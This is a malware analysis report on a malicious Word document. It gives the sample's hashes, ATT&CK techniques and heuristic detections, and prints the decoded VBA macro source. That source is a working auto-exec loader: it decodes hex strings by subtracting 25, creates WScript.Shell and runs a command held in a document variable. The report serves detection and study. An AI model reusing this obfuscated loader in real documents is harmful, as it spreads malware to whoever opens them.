Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6e1583f6bf501c08…

MALICIOUS

Office (OLE)

228.5 KB Created: 2018-04-25 09:40:00 Authoring application: Microsoft Office Word First seen: 2019-04-17
MD5: b178cbb210962ee48fbf6c2382fa0975 SHA-1: f31324dafb471615f3837a5acac6dab07044c3f9 SHA-256: 6e1583f6bf501c082dfd1303c05483fd43ad29036f28bea0fea2f210c0981498
364 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

This document contains obfuscated VBA macros designed to execute automatically upon opening, as indicated by multiple high-severity heuristic firings including 'Obfuscated auto-exec VBA loader' and 'VBA p-code auto-exec with execution tokens'. The embedded URL within the document body is used as a lure to enable macros, a common tactic for malware droppers. The script likely attempts to download and execute a second-stage payload.

Heuristics 11

  • ClamAV: Xls.Malware.Valyria-6700358-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Malware.Valyria-6700358-0
  • VBA macros detected medium 6 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://newhorizons.com.sg/wp-content/uploads/2015/12/Microsoft_Word_2013_logo.svg_-600x600.png In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3951 bytes
SHA-256: b1e1538042cda0d2c9d8fcf55cfd325a5c0e9bae12b0e582f978f880bc12941e
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 12 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Public Sub Q_TBV()
    Dim W_YL As Object: Set W_YL = VBA.CreateObject(O_VR("706C7C8B82898D476C817E8585"))
    Dim Y_C As String
Y_C = "58588C585858478D543058698551585868585847585857582758583A58592A2E583C585858443122474289251A5858588B1E3828589558588D582658581F5858615E58635858952E582A2D911B583743585824585864748F24585E7524584C3C587C58682A58583058"
Dim NM_PZ As String
NM_PZ = "585858802B58585845585828585887574F583823685858585831693F586B5864582858586B58411E1F414B6C587F5886898858588F89684258584C1E1F6A8A582B785E586E8D58635858876326818E5858584858587042587758193A5858226C5D41583228277F581A"
Dim R_DE As String
R_DE = "1E35936D6A695858582F585851455858915858801C2E4958588358584E79586A26672258585877385889978458587C5858581E8D58317E3D589431583C58584E58377591583E214860285858674595742C6081582B58585858584E5858582B584E5858202C5858585D"
Dim PT_IX As String
PT_IX = "6E21588B61685880285833583C4B438B58285858645858263183586D196B5858587758428B5858584B5891582B58585898585894582324217E4958582C286058246E5857613A8724587B785858761F58215858855886376C583A2688195838584A675858587F657690"
Dim QN_S As String
QN_S = "58586658583C204323586D5858584F5876402D5823585B586D58586139588B3C58585874581E5E583258676E961F5853213D6291586623414A586758585A588358582E7E581B4227582D97904D58325858586658952A53584289587D25585858885858397C1E585358"
Dim G_B As String
G_B = "5858584B8C58371D5858588358586E58706E215858695858BB58586B585873854C585858355E21496E6B1E582E5826455A5882583F1C5858585895582B5A588785585854291990525858583B8E822A586C585F48586C315C58372C79713A582D5D6258587258585832"
Dim L_QBE As String
L_QBE = "5844722458494F715841555858585F92723F584A581E264A38582B5858587E5B52353188958E5843586198587E58582B4C6F582358503E6558583C7758586E58585858585B8B4A96584F587D587A58585958516A58583C5858581F58875819587D7258544F8B7A5858"
Dim N_ZKZ As String
N_ZKZ = "58582E263D58588F276A2E7D1D585874581C845827584E1C196B58585858795858436C2658585F5D437858587D785858589377453E582058233D584B589258585882915858584A583F7F585863585858583D586C1B8C8E9865465858582B7858314F58585665582D61"
Dim G_Y As String
G_Y = "581F58582458845822585858495869585866925458342D2058582C585877755B582479865858595838375858584058691B5D58805858584B41588658447D313D6A58558E255835895858685858585858327658586B5894586A312C585F58776C28584C86585858611B"
Dim AJL_DGG As String
AJL_DGG = "81805847585849585864589080563D58588443584358584E74595863826E2923582C58585837582E73585858581E58585858693683568558585898665F7D4C53586D587D2258932D56584A585C5854735882585858865844585889582C455858433358585F581E5821"
Dim S_M As String
S_M = "4558544A58585D58585894584B979258304323654387585D31585890718C5858585A4B5855584458854A1B2769584A82585858581B4D58588D589467585858585864582D5858905855584F58722758585836415858685858318B7336582195725858581C54585D5D58"
Dim VKF_N As String
VKF_N = "2158585879865858538C5866528B555885365858585887588C463F58584958581E6058585A2A585821585C58583558583F587F91587F4858588B7A585C5861588A5E73493558C9587C58235858586F5858587C2A3C582A6E2F6D586858586E883F585858586558582B58"

    W_YL.Exec (O_VR(ActiveDocument.Variables("556D9").Value))
End Sub
Public Sub Auto_Open()
    Application.Run O_VR("67605A786E5C6F72735D635A6B")
End Sub
Sub Workbook_Open()
    Application.Run "ThisWorkbook." & O_VR("67605A786E5C6F72735D635A6B")
End Sub
Public Function O_VR(ByVal W_YL As String)
   Dim V_T As String
   Dim VTO_P As Long
   For VTO_P = 1 To Len(W_YL) Step 2
        V_T = V_T & Chr(Asc(Chr("&H" & Mid(W_YL, VTO_P, 2))) - 25)
   Next
   O_VR = V_T
End Function
Sub NGA_UCVYZDJAR()
    Q_TBV
End Sub
Public Sub Document_Open()
    Application.Run O_VR("67605A786E5C6F72735D635A6B")
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.